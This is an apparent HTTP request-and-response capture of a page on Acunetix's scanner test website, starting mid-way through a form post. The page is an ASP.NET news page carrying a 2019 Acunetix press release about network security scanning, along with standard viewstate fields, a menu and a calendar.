N0aW5nIHRlY2hub2xvZ3kuIEl0cyBpbmR1c3RyeS1sZWFkaW5nIGNyYXdsZXIgZnVsbHkgc3VwcG9ydHMgSFRNTDUsIEphdmFTY3JpcHQsIGFuZCBBSkFYLWhlYXZ5IHdlYnNpdGVzLCBlbmFibGluZyB0aGUgYXVkaXRpbmcgb2YgY29tcGxleCwgYXV0aGVudGljYXRlZCBhcHBsaWNhdGlvbnMuIEFjdW5ldGl4IHByb3ZpZGVzIHRoZSBvbmx5IHRlY2hub2xvZ3kgb24gdGhlIG1hcmtldCB0aGF0IGNhbiBhdXRvbWF0aWNhbGx5IGRldGVjdCBvdXQtb2YtYmFuZCB2dWxuZXJhYmlsaXRpZXMgYW5kIGlzIGF2YWlsYWJsZSBib3RoIGFzIGFuIG9ubGluZSBhbmQgb24tcHJlbWlzZXMgc29sdXRpb24uIEFjdW5ldGl4IGFsc28gaW5jbHVkZXMgaW50ZWdyYXRlZCB2dWxuZXJhYmlsaXR5IG1hbmFnZW1lbnQgZmVhdHVyZXMgdG8gZXh0ZW5kIHRoZSBlbnRlcnByaXNlJnJzcXVvO3MgYWJpbGl0eSB0byBjb21wcmVoZW5zaXZlbHkgbWFuYWdlLCBwcmlvcml0aXplLCBhbmQgY29udHJvbCB2dWxuZXJhYmlsaXR5IHRocmVhdHMgJm5kYXNoOyBvcmRlcmVkIGJ5IGJ1c2luZXNzIGNyaXRpY2FsaXR5LjwvcD4gICAgIDxwPjxzdHJvbmc%2BQWN1bmV0aXgsIHRoZSBDb21wYW55PC9zdHJvbmc%2BPC9wPiAgICAgPHA%2BRm91bmRlZCBpbiAyMDA0IHRvIGNvbWJhdCB0aGUgYWxhcm1pbmcgcmlzZSBpbiB3ZWIgYXBwbGljYXRpb24gYXR0YWNrcywgQWN1bmV0aXggaXMgdGhlIG1hcmtldCBsZWFkZXIgYW5kIGEgcGlvbmVlciBpbiBhdXRvbWF0ZWQgd2ViIGFwcGxpY2F0aW9uIHNlY3VyaXR5IHRlY2hub2xvZ3kuIEZyb20gaW5kaXZpZHVhbCBjb25zdWx0YW50cyB0byBlbnRlcnByaXNlcywgcGVuZXRyYXRpb24gdGVzdGVycyBhbmQgc2VjdXJpdHkgZXhwZXJ0cyBnbG9iYWxseSBkZXBlbmQgb24gQWN1bmV0aXggcHJvZHVjdHMgYW5kIHRlY2hub2xvZ2llcy4gSXQgaXMgdGhlIHRvb2wgb2YgY2hvaWNlIGZvciBtYW55IGN1c3RvbWVycyBhY3Jvc3Mgc2VjdG9ycywgaW5jbHVkaW5nIEdvdmVybm1lbnQsIE1pbGl0YXJ5LCBFZHVjYXRpb24sIFRlbGVjb21tdW5pY2F0aW9ucywgQmFua2luZywgRmluYW5jZSwgYW5kIEUtQ29tbWVyY2Ugc2VjdG9ycyBhcyB3ZWxsIGFzIG1hbnkgRm9ydHVuZSA1MDAgY29tcGFuaWVzIHN1Y2ggYXMgdGhlIFBlbnRhZ29uLCBIYXJwZXIgQ29sbGlucywgRGlzbmV5LCBBZG9iZSwgYW5kIG1hbnkgbW9yZS48L3A%2BZAIJDw8WBB4EVGV4dAUSUmVhZCB1c2VyIGNvbW1lbnRzHgtOYXZpZ2F0ZVVybAUSQ29tbWVudHMuYXNweD9pZD0wZGQCCw8WAh4Dc3JjZGRkfC%2FV3VUyYDVyDam3PHmHmEHBfQA%3D&__VIEWSTATEGENERATOR=532053C5&__EVENTVALIDATION=%2FwEWVwKZgbWNCQL%2BkPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK%2Bb8FAor5vwUCivnT2QkCivnT2QkCivnH%2FAICivnH%2FAICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P%2FxAkCv5P%2FxAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBGZvvLHX89VirHfgZv59zKO75WKS
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:41:17 GMT Content-Length: 22875
Response Body - size: 22,875 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>ReadNews</title> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="ReadNews.aspx?id=0" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTM1MjIzMjU2OQ9kFgICAQ9kFgwCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc+YWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjUvMTYvMjAxOSAxMjozMjozMCBQTWQCBQ8WAh8BBT5BY3VuZXRpeCBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgTm93IFdpdGggTmV0d29yayBTZWN1cml0eSBTY2Fuc2QCBw8WAh8BBbMePHA+PHN0cm9uZz5Mb25kb24sIFVLPC9zdHJvbmc+ICZuZGFzaDsgPHN0cm9uZz5NYXkgMjAxOTwvc3Ryb25nPiAmbmRhc2g7IEFjdW5ldGl4LCB0aGUgcGlvbmVlciBpbiBhdXRvbWF0ZWQgd2ViIGFwcGxpY2F0aW9uIHNlY3VyaXR5IHNvZnR3YXJlLCBoYXMgYW5ub3VuY2VkIHRoYXQgYWxsIHZlcnNpb25zIG9mIHRoZSA8YSBocmVmPWh0dHBzOi8vd3d3LmFjdW5ldGl4LmNvbS92dWxuZXJhYmlsaXR5LXNjYW5uZXIvPkFjdW5ldGl4IFZ1bG5lcmFiaWxpdHkgU2Nhbm5lcjwvYT4gbm93IHN1cHBvcnQgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vdnVsbmVyYWJpbGl0eS1zY2FubmVyL25ldHdvcmstc2VjdXJpdHktc2Nhbm5lci8+bmV0d29yayBzZWN1cml0eSBzY2FubmluZzwvYT4uIE5ldHdvcmsgc2VjdXJpdHkgc2NhbnMgYXJlIHBvc3NpYmxlIHRoYW5rcyB0byB0aGUgc2VhbWxlc3MgaW50ZWdyYXRpb24gb2YgQWN1bmV0aXggd2l0aCB0aGUgcG93ZXJmdWwgT3BlblZBUyBzZWN1cml0eSBzb2x1dGlvbi4gVW50aWwgbm93LCBuZXR3b3JrIHNlY3VyaXR5IHNjYW5uaW5nIGZ1bmN0aW9uYWxpdHkgd2FzIGF2YWlsYWJsZSBvbmx5IGluIEFjdW5ldGl4IE9ubGluZS48L3A+ICAgICA8cD4mbGRxdW87Tm8gbWF0dGVyIHRoZSBzaXplIG9mIHlvdXIgYnVzaW5lc3MsIHlvdSB1c2UgbXVsdGlwbGUgc2VjdXJpdHkgbWVhc3VyZXMgdG8gYWxsZXZpYXRlIGRpZmZlcmVudCB0eXBlcyBvZiByaXNrcy4gWW91ciBzZWN1cml0eSBzdHJhdGVneSBtdXN0IGFsd2F5cyBpbmNsdWRlIGJvdGggd2ViIHNlY3VyaXR5IHNjYW5zIGFuZCBuZXR3b3JrIHNlY3VyaXR5IHNjYW5zLiBBbmQgaXQgbWFrZXMgaXQgc28gbXVjaCBlYXNpZXIgYW5kIG11Y2ggbW9yZSBlZmZpY2llbnQgaWYgeW91IGNhbiBkbyB0aGUgdHdvIHRvZ2V0aGVyIHVzaW5nIGEgc2luZ2xlIGludGVncmF0ZWQgdG9vbCwmcmRxdW87IHNhaWQgTmljb2xhcyBTY2liZXJyYXMsIENUTy48L3A+ICAgICA8cD5UaGVyZSBhcmUgbWFueSBhZHZhbnRhZ2VzIG9mIHJ1bm5pbmcgbmV0d29yayBzZWN1cml0eSBzY2FucyBpbiBBY3VuZXRpeC4gSGF2aW5nIGEgc2luZ2xlIGludGVncmF0ZWQgZGFzaGJvYXJkIHdpdGggYm90aCB3ZWIgYW5kIG5ldHdvcmsgdnVsbmVyYWJpbGl0aWVzIGdpdmVzIHRoZSBiZXN0IHBvc3NpYmxlIHJpc2sgdmlzaWJpbGl0eSBhbmQgc2F2ZXMgYSBsb3Qgb2YgdGltZSBhbmQgZWZmb3J0LiBOZXR3b3JrIHNjYW5zIG1heSBhbHNvIGJlbmVmaXQgZnJvbSBvdGhlciBBY3VuZXRpeCBmZWF0dXJlcywgc3VjaCBhcyA8YSBocmVmPWh0dHBzOi8vd3d3LmFjdW5ldGl4LmNvbS92dWxuZXJhYmlsaXR5LXNjYW5uZXIvYWN1bmV0aXgtaW50ZWdyYXRpb25zLz5pc3N1ZSB0cmFja2VyIGludGVncmF0aW9uPC9hPiBhbmQgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vdnVsbmVyYWJpbGl0eS1zY2FubmVyL3Z1bG5lcmFiaWxpdHktbWFuYWdlbWVudC1yZWd1bGF0b3J5LWNvbXBsaWFuY2UvPmNvbXByZWhlbnNpdmUgcmVwb3J0aW5nPC9hPi48L3A+ICAgICA8cD48c3Ryb25nPk1vcmUgRmVhdHVyZXMgaW4gdGhlIExhdGVzdCBCdWlsZDwvc3Ryb25nPjwvcD4gICAgIDxwPk9wZW5WQVMgaW50ZWdyYXRpb24gaXMgaW50cm9kdWNlZCBhcyBwYXJ0IG9mIHRoZSBsYXRlc3QgQWN1bmV0aXggdmVyc2lvbiAxMiBidWlsZCAoPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vYmxvZy9yZWxlYXNlcy9uZXctYnVpbGQtbmV0d29yay1zY2FubmluZy1pbnRlZ3JhdGlvbi1pcHY2LXN1cHBvcnQvPmJ1aWxkIDEyLjAuMTkwNTE1MTQ5PC9hPikuIFRoaXMgbmV3IGJ1aWxkIGFsc28gaW5jbHVkZXM6PC9wPiAgICAgPHA+LSBTdXBwb3J0IGZvciBJUHY2PGJyIC8+ICAgICAtIEltcHJvdmVkIHVzYWdlIG9mIG1hY2hpbmUgcmVzb3VyY2VzPGJyIC8+ICAgICAtIEFkZGVkIHN1cHBvcnQgZm9yIFNlbGVuaXVtIHNjcmlwdHMgYXMgaW1wb3J0IGZpbGVzPGJyIC8+ICAgICAtIE11bHRpcGxlIHZ1bG5lcmFiaWxpdHkgY2hlY2tzIGZvciBTQVA8YnIgLz4gICAgIC0gVW5hdXRob3JpemVkIGFjY2VzcyBkZXRlY3Rpb24gZm9yIFJlZGlzIGFuZCBNZW1jYWNoZWQ8YnIgLz4gICAgIC0gU291cmNlIGNvZGUgZGlzY2xvc3VyZSBmb3IgUnVieSBhbmQgUHl0aG9uPC9wPiAgICAgPHA+VGhlIG5ldyBidWlsZCBhbHNvIGluY2x1ZGVzIGEgbnVtYmVyIG9mIHVwZGF0ZXMgYW5kIGZpeGVzLCBhbGwgb2Ygd2hpY2ggYXJlIGF2YWlsYWJsZSBmb3IgYm90aCBXaW5kb3dzIGFuZCBMaW51eC4gTW9yZSBpbmZvcm1hdGlvbiBjYW4gYmUgZm91bmQgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vYmxvZy9yZWxlYXNlcy9uZXctYnVpbGQtbmV0d29yay1zY2FubmluZy1pbnRlZ3JhdGlvbi1pcHY2LXN1cHBvcnQvPmhlcmU8L2E+LjwvcD4gICAgIDxwPkdldCBhIGRlbW8gb2YgdGhlIHByb2R1Y3QgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vbmV0d29yay1zZWN1cml0eS1zY2FubmVyLz5oZXJlPC9hPi48L3A+ICAgICA8cD48c3Ryb25nPkFib3V0IEFjdW5ldGl4PC9zdHJvbmc+PC9wPiAgICAgPHA+VXNlci1mcmllbmRseSBhbmQgY29tcGV0aXRpdmVseSBwcmljZWQsIEFjdW5ldGl4IGxlYWRzIHRoZSBtYXJrZXQgaW4gYXV0b21hdGljIHdlYiBzZWN1cml0eSB0ZXN0aW5nIHRlY2hub2xvZ3kuIEl0cyBpbmR1c3RyeS1sZWFkaW5nIGNyYXdsZXIgZnVsbHkgc3VwcG9ydHMgSFRNTDUsIEphdmFTY3JpcHQsIGFuZCBBSkFYLWhlYXZ5IHdlYnNpdGVzLCBlbmFibGluZyB0aGUgYXVkaXRpbmcgb2YgY29tcGxleCwgYXV0aGVudGljYXRlZCBhcHBsaWNhdGlvbnMuIEFjdW5ldGl4IHByb3ZpZGVzIHRoZSBvbmx5IHRlY2hub2xvZ3kgb24gdGhlIG1hcmtldCB0aGF0IGNhbiBhdXRvbWF0aWNhbGx5IGRldGVjdCBvdXQtb2YtYmFuZCB2dWxuZXJhYmlsaXRpZXMgYW5kIGlzIGF2YWlsYWJsZSBib3RoIGFzIGFuIG9ubGluZSBhbmQgb24tcHJlbWlzZXMgc29sdXRpb24uIEFjdW5ldGl4IGFsc28gaW5jbHVkZXMgaW50ZWdyYXRlZCB2dWxuZXJhYmlsaXR5IG1hbmFnZW1lbnQgZmVhdHVyZXMgdG8gZXh0ZW5kIHRoZSBlbnRlcnByaXNlJnJzcXVvO3MgYWJpbGl0eSB0byBjb21wcmVoZW5zaXZlbHkgbWFuYWdlLCBwcmlvcml0aXplLCBhbmQgY29udHJvbCB2dWxuZXJhYmlsaXR5IHRocmVhdHMgJm5kYXNoOyBvcmRlcmVkIGJ5IGJ1c2luZXNzIGNyaXRpY2FsaXR5LjwvcD4gICAgIDxwPjxzdHJvbmc+QWN1bmV0aXgsIHRoZSBDb21wYW55PC9zdHJvbmc+PC9wPiAgICAgPHA+Rm91bmRlZCBpbiAyMDA0IHRvIGNvbWJhdCB0aGUgYWxhcm1pbmcgcmlzZSBpbiB3ZWIgYXBwbGljYXRpb24gYXR0YWNrcywgQWN1bmV0aXggaXMgdGhlIG1hcmtldCBsZWFkZXIgYW5kIGEgcGlvbmVlciBpbiBhdXRvbWF0ZWQgd2ViIGFwcGxpY2F0aW9uIHNlY3VyaXR5IHRlY2hub2xvZ3kuIEZyb20gaW5kaXZpZHVhbCBjb25zdWx0YW50cyB0byBlbnRlcnByaXNlcywgcGVuZXRyYXRpb24gdGVzdGVycyBhbmQgc2VjdXJpdHkgZXhwZXJ0cyBnbG9iYWxseSBkZXBlbmQgb24gQWN1bmV0aXggcHJvZHVjdHMgYW5kIHRlY2hub2xvZ2llcy4gSXQgaXMgdGhlIHRvb2wgb2YgY2hvaWNlIGZvciBtYW55IGN1c3RvbWVycyBhY3Jvc3Mgc2VjdG9ycywgaW5jbHVkaW5nIEdvdmVybm1lbnQsIE1pbGl0YXJ5LCBFZHVjYXRpb24sIFRlbGVjb21tdW5pY2F0aW9ucywgQmFua2luZywgRmluYW5jZSwgYW5kIEUtQ29tbWVyY2Ugc2VjdG9ycyBhcyB3ZWxsIGFzIG1hbnkgRm9ydHVuZSA1MDAgY29tcGFuaWVzIHN1Y2ggYXMgdGhlIFBlbnRhZ29uLCBIYXJwZXIgQ29sbGlucywgRGlzbmV5LCBBZG9iZSwgYW5kIG1hbnkgbW9yZS48L3A+ZAIJDw8WBB4EVGV4dAUSUmVhZCB1c2VyIGNvbW1lbnRzHgtOYXZpZ2F0ZVVybAUSQ29tbWVudHMuYXNweD9pZD0wZGQCCw8WAh4Dc3JjZGRkfC/V3VUyYDVyDam3PHmHmEHBfQA=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="532053C5" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwKZgbWNCQL+kPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK+b8FAor5vwUCivnT2QkCivnT2QkCivnH/AICivnH/AICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P/xAkCv5P/xAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBGZvvLHX89VirHfgZv59zKO75WKS" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD vAlign="top"> <DIV id="divNewsDate" class="NewsDate">posted by <strong>admin </strong>5/16/2019 12:32:30 PM</DIV> <DIV id="divNewsTitle" class="NewsTitle">Acunetix Vulnerability Scanner Now With Network Security Scans</DIV> <DIV id="divNewsLong" class="NewsLong"><p><strong>London, UK</strong> – <strong>May 2019</strong> – Acunetix, the pioneer in automated web application security software, has announced that all versions of the <a href=https://www.acunetix.com/vulnerability-scanner/>Acunetix Vulnerability Scanner</a> now support <a href=https://www.acunetix.com/vulnerability-scanner/network-security-scanner/>network security scanning</a>. Network security scans are possible thanks to the seamless integration of Acunetix with the powerful OpenVAS security solution. Until now, network security scanning functionality was available only in Acunetix Online.</p> <p>“No matter the size of your business, you use multiple security measures to alleviate different types of risks. Your security strategy must always include both web security scans and network security scans. And it makes it so much easier and much more efficient if you can do the two together using a single integrated tool,” said Nicolas Sciberras, CTO.</p> <p>There are many advantages of running network security scans in Acunetix. Having a single integrated dashboard with both web and network vulnerabilities gives the best possible risk visibility and saves a lot of time and effort. Network scans may also benefit from other Acunetix features, such as <a href=https://www.acunetix.com/vulnerability-scanner/acunetix-integrations/>issue tracker integration</a> and <a href=https://www.acunetix.com/vulnerability-scanner/vulnerability-management-regulatory-compliance/>comprehensive reporting</a>.</p> <p><strong>More Features in the Latest Build</strong></p> <p>OpenVAS integration is introduced as part of the latest Acunetix version 12 build (<a href=https://www.acunetix.com/blog/releases/new-build-network-scanning-integration-ipv6-support/>build 12.0.190515149</a>). This new build also includes:</p> <p>- Support for IPv6<br /> - Improved usage of machine resources<br /> - Added support for Selenium scripts as import files<br /> - Multiple vulnerability checks for SAP<br /> - Unauthorized access detection for Redis and Memcached<br /> - Source code disclosure for Ruby and Python</p> <p>The new build also includes a number of updates and fixes, all of which are available for both Windows and Linux. More information can be found <a href=https://www.acunetix.com/blog/releases/new-build-network-scanning-integration-ipv6-support/>here</a>.</p> <p>Get a demo of the product <a href=https://www.acunetix.com/network-security-scanner/>here</a>.</p> <p><strong>About Acunetix</strong></p> <p>User-friendly and competitively priced, Acunetix leads the market in automatic web security testing technology. Its industry-leading crawler fully supports HTML5, JavaScript, and AJAX-heavy websites, enabling the auditing of complex, authenticated applications. Acunetix provides the only technology on the market that can automatically detect out-of-band vulnerabilities and is available both as an online and on-premises solution. Acunetix also includes integrated vulnerability management features to extend the enterprise’s ability to comprehensively manage, prioritize, and control vulnerability threats – ordered by business criticality.</p> <p><strong>Acunetix, the Company</strong></p> <p>Founded in 2004 to combat the alarming rise in web application attacks, Acunetix is the market leader and a pioneer in automated web application security technology. From individual consultants to enterprises, penetration testers and security experts globally depend on Acunetix products and technologies. It is the tool of choice for many customers across sectors, including Government, Military, Education, Telecommunications, Banking, Finance, and E-Commerce sectors as well as many Fortune 500 companies such as the Pentagon, Harper Collins, Disney, Adobe, and many more.</p></DIV> <TABLE id="Table2" cellSpacing="0" cellPadding="0" width="500" border="0"> <TR> <TD vAlign="bottom"><IMG src="images/comment-before.gif"></TD> </TR> <TR> <TD class="Comment" vAlign="middle"> <a id="hlComments" href="Comments.aspx?id=0">Read user comments</a></TD> </TR> <TR> <TD vAlign="top"><IMG src="images/comment-after.gif"></TD> </TR> </TABLE> <center> <iframe id="adsFrame" width="200" height="110" style="BORDER-RIGHT: lemonchiffon 1px solid; BORDER-TOP: lemonchiffon 1px solid; BORDER-LEFT: lemonchiffon 1px solid; BORDER-BOTTOM: lemonchiffon 1px solid" frameBorder="no" scrolling="no"></iframe> </center> </TD> <TD vAlign="top" width="200" colSpan="2"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8340')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">December 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8401')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8366')" style="color:Black" title="November 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8367')" style="color:Black" title="November 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8368')" style="color:Black" title="November 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8369')" style="color:Black" title="November 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8370')" style="color:Black" title="December 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8371')" style="color:Black" title="December 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8372')" style="color:Black" title="December 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8373')" style="color:Black" title="December 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8374')" style="color:Black" title="December 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8375')" style="color:Black" title="December 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8376')" style="color:Black" title="December 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8377')" style="color:Black" title="December 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8378')" style="color:Black" title="December 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8379')" style="color:Black" title="December 10">10</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8380')" style="color:Black" title="December 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8381')" style="color:Black" title="December 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8382')" style="color:Black" title="December 13">13</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8383')" style="color:Black" title="December 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8384')" style="color:Black" title="December 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8385')" style="color:Black" title="December 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8386')" style="color:Black" title="December 17">17</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8387')" style="color:Black" title="December 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8388')" style="color:Black" title="December 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8389')" style="color:Black" title="December 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8390')" style="color:Black" title="December 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8391')" style="color:Black" title="December 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8392')" style="color:Black" title="December 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8393')" style="color:Black" title="December 24">24</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8394')" style="color:Black" title="December 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8395')" style="color:Black" title="December 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8396')" style="color:Black" title="December 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8397')" style="color:Black" title="December 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8398')" style="color:Black" title="December 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8399')" style="color:Black" title="December 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8400')" style="color:Black" title="December 31">31</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8401')" style="color:Black" title="January 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8402')" style="color:Black" title="January 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8403')" style="color:Black" title="January 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8404')" style="color:Black" title="January 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8405')" style="color:Black" title="January 05">5</a></td><td align="center" style="width:14%;"><a 